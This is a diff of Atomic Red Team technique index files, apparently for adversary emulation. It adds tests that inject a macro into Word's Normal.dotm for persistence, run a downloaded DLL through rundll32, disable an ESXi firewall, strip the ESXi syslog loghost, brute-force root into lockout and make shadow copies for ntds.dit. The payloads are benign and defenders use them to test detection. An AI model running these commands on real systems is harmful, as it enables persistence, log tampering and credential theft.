@@ -30176,7 +30176,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -30228,6 +30228,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/containers-index.yaml

@@ -29916,7 +29916,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29968,6 +29968,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -29478,7 +29478,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29530,6 +29530,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -29362,7 +29362,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29414,6 +29414,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -29733,7 +29733,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29785,6 +29785,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -29757,7 +29757,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29809,6 +29809,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -29711,7 +29711,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29763,6 +29763,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/index.yaml

@@ -684,6 +684,35 @@ defense-evasion:
           copy #{exe_to_launch} not_an_scr.scr
           rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
         cleanup_command: del not_an_scr.scr
+    - name: Running DLL with .init extension and function
+      auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+      description: |
+        This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+        DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_file:
+          description: The DLL file to be called
+          type: string
+          default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+        dll_url:
+          description: The URL to the DLL file that must be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+      dependency_executor_name: powershell
+      dependencies:
+      - description: The DLL file to be called must exist at the specified location
+          (#{dll_file})
+        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+      executor:
+        command: 'rundll32.exe #{dll_file},krnl
+
+          '
+        name: command_prompt
   T1027.009:
     technique:
       modified: '2023-09-29T21:14:57.263Z'
@@ -11130,6 +11159,48 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: ESXi - Disable Firewall via Esxcli
+      auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+      description: 'Adversaries may disable the ESXI firewall via ESXCLI
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
+          PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
+        cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
+          -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
+        name: command_prompt
+        elevation_required: false
   T1553.003:
     technique:
       x_mitre_platforms:
@@ -60750,7 +60821,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -60802,7 +60873,104 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-    atomic_tests: []
+      identifier: T1137.001
+    atomic_tests:
+    - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
+        PowerShell
+      auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+      description: 'Injects a Macro in the Word default template "Normal.dotm" and
+        makes it execute each time that Word is opened. In this test, the Macro creates
+        a sheduled task to open Calc.exe every evening.
+
+        '
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Word must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Word.Application" | Out-Null
+            Stop-Process -Name "winword"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+          to meet this requirement"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Registry setting to \"Trust access to the VBA project object model\"
+          in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file
+          will be created if Registry setting did not already exist or if it was set
+          to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey
+          -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical
+          operation to: if the value of the key/value is 1, do nothing - \n# if the
+          value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create
+          the value and flag2\nif ($value -eq \"1\") \n{\n  Write-Host \"The registry
+          value '$registryValue' already exists with the required setting.\"\n}   \n
+          \ elseif ($value -eq \"0\") \n{\n  Write-Host \"The registry value was set
+          to 0, temporarily changing to 1.\"\n  New-ItemProperty -Path $registryKey
+          -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n
+          \ echo \"flag1\" > $flagPath1\n} \n  else \n{\n  Write-Host \"The registry
+          value '$registryValue' does not exist, temporarily creating it.\"\n  New-ItemProperty
+          -Path $registryKey -Name $registryValue -Value $registryData -PropertyType
+          DWORD -Force | Out-Null\n  echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName
+          Microsoft.Office.Interop.Word\n# Define the path of copied normal template
+          for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination
+          $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a
+          scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n
+          \ Sub AutoExec()\n  Dim applicationPath As String\n  Dim taskName As String\n
+          \ Dim runTime As String\n  Dim schTasksCmd As String\n  applicationPath
+          = \"C:\\Windows\\System32\\calc.exe\"\n  taskName = \"OpenCalcTask\"\n  runTime
+          = \"20:04\"\n  schTasksCmd = \"schtasks /create /tn \"\"\" & taskName &
+          \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime
+          & \" /f\"\n  Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n  End Sub\n\"@\n#
+          Create a new instance of Word.Application\n$word = New-Object -ComObject
+          Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n#
+          Open the document\n$document = $word.Documents.Open($docPath)\n# Access
+          the VBA project of the document\n$vbaProject = $document.VBProject\n# Add
+          a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1)
+          # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n#
+          Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n#
+          Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule)
+          | Out-Null\n"
+        cleanup_command: "# Registry setting to \"Trust access to the VBA project
+          object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines
+          the path each flag file created depending on the original registry state\n$flagPath1
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\"
+          /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif
+          (Test-Path $copyPath)\n{\n  #Delete the injected template\n  Remove-Item
+          -Force $docPath -ErrorAction SilentlyContinue\n  # Restore the original
+          template\n  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction
+          SilentlyContinue\n  Write-Host \"The original template has been restored\"\n}\n
+          \ else\n{\n  Write-Host \"The original template is present\"\n}\n#Restore
+          the original state of the registry key\nif (Test-Path $flagPath1) \n{\n
+          \ # The value was originally 0, set back to 0\n  New-ItemProperty -Path
+          $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD
+          -Force | Out-Null\n  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n
+          \ Write-Host \"The original registry state has been restored\"\n} \n  elseif
+          (Test-Path $flagPath2)\n{\n  #The value did not previously exist, delete
+          the value\n  Remove-ItemProperty -Path $registryKey -Name $registryValue
+          | Out-Null\n  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue
+          | Out-Null\n  Write-Host \"The original registry state has been restored\"\n}\n
+          \ else \n{\n  # The value was already 1, do nothing\n  Write-Host \"The
+          value $registryValue already existed in $registryKey.\"\n}\n"
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -74546,6 +74714,65 @@ collection:
         cleanup_command: 'rm -rf #{input_folder}'
         name: bash
         elevation_required: false
+    - name: ESXi - Remove Syslog remote IP
+      auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+      description: 'An adversary may edit the syslog config to remove the loghost
+        in order to prevent or redirect logs being received by SIEM.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: Username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "# Extract line with IP address from the syslog configuration output\n#{plink_file}
+          -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt
+          | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n#
+          Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username}
+          -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n#
+          Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath
+          = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath
+          -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n    Write-Host
+          \"The content is $fileContent\"\n    Write-Host \"The file is empty\"\n}
+          else {\n    # Use a regular expression to extract IP addresses\n    $ipAddresses
+          = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n
+          \   \n    $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n
+          \   $output | Out-File -FilePath $outputFilePath -Encoding ascii\n    \n
+          \   Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n"
+        cleanup_command: |
+          # Re-add the initially extracted IP
+          #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+          rm c:\temp\loghost_ip.txt
+          rm c:\temp\loghost.txt
+        name: powershell
+        elevation_required: true
   T1113:
     technique:
       modified: '2023-03-30T21:01:39.967Z'
@@ -81852,6 +82079,46 @@ credential-access:
         cleanup_command: 'rmuser -y art
 
           '
+    - name: ESXi - Brute Force Until Account Lockout
+      auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+      description: |
+        An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+        In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        lockout_threshold:
+          description: Specify the account lockout threshold configured on the ESXI
+            management server
+          type: string
+          default: '5'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: |
+          $lockout_threshold = [int]"#{lockout_threshold}"
+          for ($var = 1; $var -le $lockout_threshold; $var++) {
+            #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+            }
+        name: powershell
+        elevation_required: false
   T1003:
     technique:
       x_mitre_platforms:
@@ -90793,6 +91060,24 @@ credential-access:
           mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         name: command_prompt
         elevation_required: true
+    - name: Create Volume Shadow Copy with diskshadow
+      auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+      description: |
+        This test is intended to be run on a domain controller
+        An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the script
+          type: Path
+          default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+      executor:
+        command: |
+          mkdir c:\exfil
+          diskshadow.exe /s #{filename}
+        name: command_prompt
+        elevation_required: true
   T1558.003:
     technique:
       modified: '2023-03-30T21:01:46.538Z'

atomics/Indexes/linux-index.yaml

@@ -35883,7 +35883,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -35935,6 +35935,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/macos-index.yaml

@@ -32832,7 +32832,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -32884,6 +32884,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/office-365-index.yaml

@@ -29543,7 +29543,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29595,6 +29595,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/saas-index.yaml

@@ -29362,7 +29362,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29414,6 +29414,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:

atomics/Indexes/windows-index.yaml

@@ -684,6 +684,35 @@ defense-evasion:
           copy #{exe_to_launch} not_an_scr.scr
           rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
         cleanup_command: del not_an_scr.scr
+    - name: Running DLL with .init extension and function
+      auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+      description: |
+        This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+        DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_file:
+          description: The DLL file to be called
+          type: string
+          default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+        dll_url:
+          description: The URL to the DLL file that must be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+      dependency_executor_name: powershell
+      dependencies:
+      - description: The DLL file to be called must exist at the specified location
+          (#{dll_file})
+        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+      executor:
+        command: 'rundll32.exe #{dll_file},krnl
+
+          '
+        name: command_prompt
   T1027.009:
     technique:
       modified: '2023-09-29T21:14:57.263Z'
@@ -8589,6 +8618,48 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: ESXi - Disable Firewall via Esxcli
+      auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+      description: 'Adversaries may disable the ESXI firewall via ESXCLI
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
+          PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
+        cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
+          -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
+        name: command_prompt
+        elevation_required: false
   T1553.003:
     technique:
       x_mitre_platforms:
@@ -50264,7 +50335,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -50316,7 +50387,104 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-    atomic_tests: []
+      identifier: T1137.001
+    atomic_tests:
+    - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
+        PowerShell
+      auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+      description: 'Injects a Macro in the Word default template "Normal.dotm" and
+        makes it execute each time that Word is opened. In this test, the Macro creates
+        a sheduled task to open Calc.exe every evening.
+
+        '
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Word must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Word.Application" | Out-Null
+            Stop-Process -Name "winword"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+          to meet this requirement"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Registry setting to \"Trust access to the VBA project object model\"
+          in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file
+          will be created if Registry setting did not already exist or if it was set
+          to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey
+          -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical
+          operation to: if the value of the key/value is 1, do nothing - \n# if the
+          value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create
+          the value and flag2\nif ($value -eq \"1\") \n{\n  Write-Host \"The registry
+          value '$registryValue' already exists with the required setting.\"\n}   \n
+          \ elseif ($value -eq \"0\") \n{\n  Write-Host \"The registry value was set
+          to 0, temporarily changing to 1.\"\n  New-ItemProperty -Path $registryKey
+          -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n
+          \ echo \"flag1\" > $flagPath1\n} \n  else \n{\n  Write-Host \"The registry
+          value '$registryValue' does not exist, temporarily creating it.\"\n  New-ItemProperty
+          -Path $registryKey -Name $registryValue -Value $registryData -PropertyType
+          DWORD -Force | Out-Null\n  echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName
+          Microsoft.Office.Interop.Word\n# Define the path of copied normal template
+          for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination
+          $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a
+          scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n
+          \ Sub AutoExec()\n  Dim applicationPath As String\n  Dim taskName As String\n
+          \ Dim runTime As String\n  Dim schTasksCmd As String\n  applicationPath
+          = \"C:\\Windows\\System32\\calc.exe\"\n  taskName = \"OpenCalcTask\"\n  runTime
+          = \"20:04\"\n  schTasksCmd = \"schtasks /create /tn \"\"\" & taskName &
+          \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime
+          & \" /f\"\n  Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n  End Sub\n\"@\n#
+          Create a new instance of Word.Application\n$word = New-Object -ComObject
+          Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n#
+          Open the document\n$document = $word.Documents.Open($docPath)\n# Access
+          the VBA project of the document\n$vbaProject = $document.VBProject\n# Add
+          a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1)
+          # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n#
+          Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n#
+          Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document)
